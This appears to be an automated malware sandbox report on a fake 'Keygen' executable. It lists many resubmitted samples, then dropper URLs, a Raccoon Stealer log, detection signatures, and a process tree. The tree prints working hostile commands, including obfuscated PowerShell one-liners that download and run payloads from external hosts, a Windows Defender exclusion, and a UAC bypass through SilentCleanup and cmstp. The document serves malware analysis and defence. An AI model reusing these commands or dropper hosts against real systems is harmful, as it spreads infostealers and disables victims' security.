Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    152s
  • max time network
    167s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    01-10-2020 20:51

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (20) — копия.exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 01:04:12 GMT Bot_ID: 992575D9-3ACE-4400-98F7-F39D82F3369F_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 0 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.51 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: ELJKIHEZ - Username: Admin - Windows version: NT 6.1 - Product name: Windows 7 Professional - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 2047 MB (514 MB used) - Screen resolution: 1280x720 - Display devices: 0) Standard VGA Graphics Adapter ============

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader First Stage 3 IoCs
  • ModiLoader Second Stage 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 25 IoCs
  • Loads dropped DLL 53 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 6 IoCs
  • Modifies registry key 1 TTPs 3 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (20) — копия.exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (20) — копия.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1300
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\3949.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (20) — ?????.exe""
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1824
      • C:\Users\Admin\AppData\Local\Temp\3949.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1860
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\3949.tmp\m.hta"
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1792
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1940
          • C:\Users\Public\jlu.exe
            "C:\Users\Public\jlu.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            PID:2468
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:2552
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:2640
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 2640 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\846089015004054\\* & exit
                  8⤵
                    PID:2152
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 2640
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1136
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2584
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2692
              • C:\Users\Public\jlu.exe
                "C:\Users\Public\jlu.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops desktop.ini file(s)
                • Modifies system certificate store
                PID:2628
                • C:\Users\Admin\AppData\Local\Temp\7YV5UTmxW1.exe
                  "C:\Users\Admin\AppData\Local\Temp\7YV5UTmxW1.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:320
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                    "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\7YV5UTmxW1.exe"'
                    8⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2492
                • C:\Users\Admin\AppData\Local\Temp\ZU1WuBNNan.exe
                  "C:\Users\Admin\AppData\Local\Temp\ZU1WuBNNan.exe"
                  7⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  PID:2736
                  • C:\Windows\SysWOW64\Notepad.exe
                    "C:\Windows\System32\Notepad.exe"
                    8⤵
                      PID:912
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c C:\Users\Public\Natso.bat
                        9⤵
                          PID:2052
                          • C:\Windows\SysWOW64\reg.exe
                            reg delete hkcu\Environment /v windir /f
                            10⤵
                            • Modifies registry key
                            PID:1396
                          • C:\Windows\SysWOW64\reg.exe
                            reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
                            10⤵
                            • Modifies registry key
                            PID:2540
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
                            10⤵
                              PID:524
                            • C:\Windows\SysWOW64\reg.exe
                              reg delete hkcu\Environment /v windir /f
                              10⤵
                              • Modifies registry key
                              PID:2108
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c start /min C:\Users\Public\x.bat
                              10⤵
                                PID:1032
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c C:\Users\Public\Natso.bat
                              9⤵
                                PID:2136
                            • C:\Program Files (x86)\internet explorer\ieinstal.exe
                              "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                              8⤵
                                PID:636
                            • C:\Users\Admin\AppData\Local\Temp\8dP3WoGb3J.exe
                              "C:\Users\Admin\AppData\Local\Temp\8dP3WoGb3J.exe"
                              7⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of SetWindowsHookEx
                              PID:2636
                              • \??\c:\windows\SysWOW64\cmstp.exe
                                "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\pwgdy45s.inf
                                8⤵
                                  PID:2612
                              • C:\Users\Admin\AppData\Local\Temp\qdBDEAERsZ.exe
                                "C:\Users\Admin\AppData\Local\Temp\qdBDEAERsZ.exe"
                                7⤵
                                • Executes dropped EXE
                                • Windows security modification
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1996
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  "powershell" Get-MpPreference -verbose
                                  8⤵
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2140
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\jlu.exe"
                                7⤵
                                  PID:1512
                                  • C:\Windows\SysWOW64\timeout.exe
                                    timeout /T 10 /NOBREAK
                                    8⤵
                                    • Delays execution with timeout.exe
                                    PID:2940
                        • C:\Windows\SysWOW64\mshta.exe
                          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\3949.tmp\m1.hta"
                          3⤵
                          • Modifies Internet Explorer settings
                          • Suspicious use of WriteProcessMemory
                          PID:1764
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                            4⤵
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1916
                        • C:\Windows\SysWOW64\timeout.exe
                          timeout 1
                          3⤵
